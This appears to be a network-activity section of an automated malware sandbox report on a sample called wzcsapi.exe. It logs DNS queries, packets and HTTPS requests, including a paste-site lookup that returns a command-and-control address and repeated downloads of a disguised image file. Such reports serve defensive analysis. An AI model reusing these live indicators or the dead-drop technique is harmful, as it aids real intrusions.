                                                                                                                                                                                                                                              Oct 15, 2024 11:22:13.726174116 CEST52502443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:13.726213932 CEST44352502162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.080781937 CEST44352502162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.080926895 CEST44352502162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.081008911 CEST52502443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.081418037 CEST52502443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.081446886 CEST44352502162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.082315922 CEST52503443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.082365990 CEST44352503162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.082442045 CEST52503443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.082711935 CEST52503443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.082727909 CEST44352503162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.947473049 CEST44352503162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.949083090 CEST52503443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:14.949110031 CEST44352503162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:15.310749054 CEST44352503162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:15.310874939 CEST44352503162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:15.310926914 CEST52503443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:15.315097094 CEST52503443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:15.315114021 CEST44352503162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:18.214977980 CEST5249436538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:18.219789028 CEST3653852494147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:22.787173986 CEST52504443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:22.787283897 CEST44352504162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:22.787415028 CEST52504443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:22.787893057 CEST52504443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:22.787925959 CEST44352504162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:23.652817011 CEST44352504162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:23.652961016 CEST52504443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:23.658840895 CEST52504443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:23.658858061 CEST44352504162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:23.659272909 CEST44352504162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:23.660406113 CEST52504443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:23.703418970 CEST44352504162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.020042896 CEST44352504162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.020119905 CEST44352504162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.020313978 CEST52504443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.020807981 CEST52504443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.020814896 CEST44352504162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.022944927 CEST52505443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.023000956 CEST44352505162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.023083925 CEST52505443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.023432970 CEST52505443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.023458004 CEST44352505162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.882096052 CEST44352505162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.883615017 CEST52505443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:24.883661032 CEST44352505162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:25.241589069 CEST44352505162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:25.241662025 CEST44352505162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:25.241802931 CEST52505443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:25.242170095 CEST52505443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:25.242211103 CEST44352505162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:26.881401062 CEST52506443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:26.881472111 CEST44352506162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:26.881690979 CEST52506443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:26.882097006 CEST52506443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:26.882131100 CEST44352506162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:27.768136024 CEST44352506162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:27.773684978 CEST52506443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:27.773704052 CEST44352506162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:28.152811050 CEST44352506162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:28.152961016 CEST44352506162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:28.153059959 CEST52506443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:28.153436899 CEST52506443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:28.153450966 CEST44352506162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:28.154016972 CEST52507443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:28.154129028 CEST44352507162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:28.154206991 CEST52507443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:28.154460907 CEST52507443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:28.154496908 CEST44352507162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:29.027189016 CEST44352507162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:29.114901066 CEST52507443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:34.671673059 CEST52507443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:34.671710968 CEST44352507162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:34.672995090 CEST5250836538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:34.677897930 CEST3653852508147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:34.678251982 CEST5250836538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:34.692373991 CEST5250836538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:34.697277069 CEST3653852508147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:35.032063007 CEST44352507162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:35.032129049 CEST44352507162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:35.032186985 CEST52507443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:35.032949924 CEST52507443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:35.032979965 CEST44352507162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.037328959 CEST52509443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.037374973 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.037441015 CEST52509443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.037852049 CEST52509443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.037861109 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.892651081 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.892767906 CEST52509443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.894128084 CEST52509443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.894145012 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.894927025 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.896023989 CEST52509443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.943404913 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.249135017 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.249275923 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.249350071 CEST52509443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.249560118 CEST52509443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.249596119 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.250035048 CEST52510443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.250083923 CEST44352510162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.250179052 CEST52510443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.250376940 CEST52510443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:38.250406027 CEST44352510162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.142594099 CEST44352510162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.143913984 CEST52510443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.143959999 CEST44352510162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.523911953 CEST44352510162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.523981094 CEST44352510162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.524043083 CEST52510443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.524547100 CEST52510443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:39.524569988 CEST44352510162.19.58.157192.168.2.7

                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.153187037 CEST6457653192.168.2.71.1.1.1
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.162574053 CEST53645761.1.1.1192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:33.351094961 CEST5917353192.168.2.71.1.1.1
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:33.358406067 CEST53591731.1.1.1192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:40.308948040 CEST53564211.1.1.1192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.366416931 CEST6052753192.168.2.71.1.1.1
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.374453068 CEST53605271.1.1.1192.168.2.7

                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.153187037 CEST192.168.2.71.1.1.10x6878Standard query (0)rentry.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:33.351094961 CEST192.168.2.71.1.1.10x3237Standard query (0)i.ibb.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.366416931 CEST192.168.2.71.1.1.10x5eb9Standard query (0)i.ibb.coA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:25.756997108 CEST1.1.1.1192.168.2.70xecf1No error (0)windowsupdatebg.s.llnwi.net178.79.208.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:25.756997108 CEST1.1.1.1192.168.2.70xecf1No error (0)windowsupdatebg.s.llnwi.net87.248.202.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.162574053 CEST1.1.1.1192.168.2.70x6878No error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.162574053 CEST1.1.1.1192.168.2.70x6878No error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:27.162574053 CEST1.1.1.1192.168.2.70x6878No error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:33.358406067 CEST1.1.1.1192.168.2.70x3237No error (0)i.ibb.co169.197.85.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.374453068 CEST1.1.1.1192.168.2.70x5eb9No error (0)i.ibb.co162.19.58.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.374453068 CEST1.1.1.1192.168.2.70x5eb9No error (0)i.ibb.co162.19.58.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.374453068 CEST1.1.1.1192.168.2.70x5eb9No error (0)i.ibb.co162.19.58.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.374453068 CEST1.1.1.1192.168.2.70x5eb9No error (0)i.ibb.co162.19.58.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.374453068 CEST1.1.1.1192.168.2.70x5eb9No error (0)i.ibb.co162.19.58.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Oct 15, 2024 11:20:41.374453068 CEST1.1.1.1192.168.2.70x5eb9No error (0)i.ibb.co162.19.58.156A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                              • rentry.co
                                                                                                                                                                                                                                              • i.ibb.co

                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.2.749731104.26.2.164436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:27 UTC68OUTGET /tranr/raw HTTP/1.1
                                                                                                                                                                                                                                              Host: rentry.co
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              2024-10-15 09:20:28 UTC700INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Tue, 15 Oct 2024 09:20:28 GMT
                                                                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 20
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              vary: Origin
                                                                                                                                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                              Cache-Control: Vary
                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q39fQpjZVqjwk7n458OT06lC%2FXNeAi%2BdIOM%2Bi4sk3CVBIuMjw9q%2F%2FXPnS29tyFuAF6ohH1gndNf3FOWvVx1P4JFVqENzpZN8gzcdLBcITNq4SwlkSmwCeVYmtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8d2ebbbf2a576b37-DFW
                                                                                                                                                                                                                                              2024-10-15 09:20:28 UTC20INData Raw: 31 34 37 2e 31 38 35 2e 32 32 31 2e 31 38 3a 33 36 35 33 38
                                                                                                                                                                                                                                              Data Ascii: 147.185.221.18:36538


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              1192.168.2.749767169.197.85.954436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:34 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              2192.168.2.749773169.197.85.954436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:35 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              3192.168.2.749790169.197.85.954436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:38 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              4192.168.2.749796169.197.85.954436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:39 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              5192.168.2.752287162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:42 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              6192.168.2.752294162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:43 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              7192.168.2.752317162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:46 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              8192.168.2.752323162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:47 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              9192.168.2.752344162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:51 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              10192.168.2.752350162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:52 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              11192.168.2.752368162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:55 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              12192.168.2.752375162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:20:56 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              13192.168.2.752397162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:00 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              14192.168.2.752403162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:01 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              15192.168.2.752419162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:05 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              16192.168.2.752430162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:06 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              17192.168.2.752447162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:09 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              18192.168.2.752458162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:10 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              19192.168.2.752474162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:14 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              20192.168.2.752481162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:15 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              21192.168.2.752484162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:19 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              22192.168.2.752485162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-10-15 09:21:20 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                                                                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                                                                                                              Connection: Keep-Alive


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              23192.168.2.752486162.19.58.1574436880C:\Users\user\Desktop\wzcsapi.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
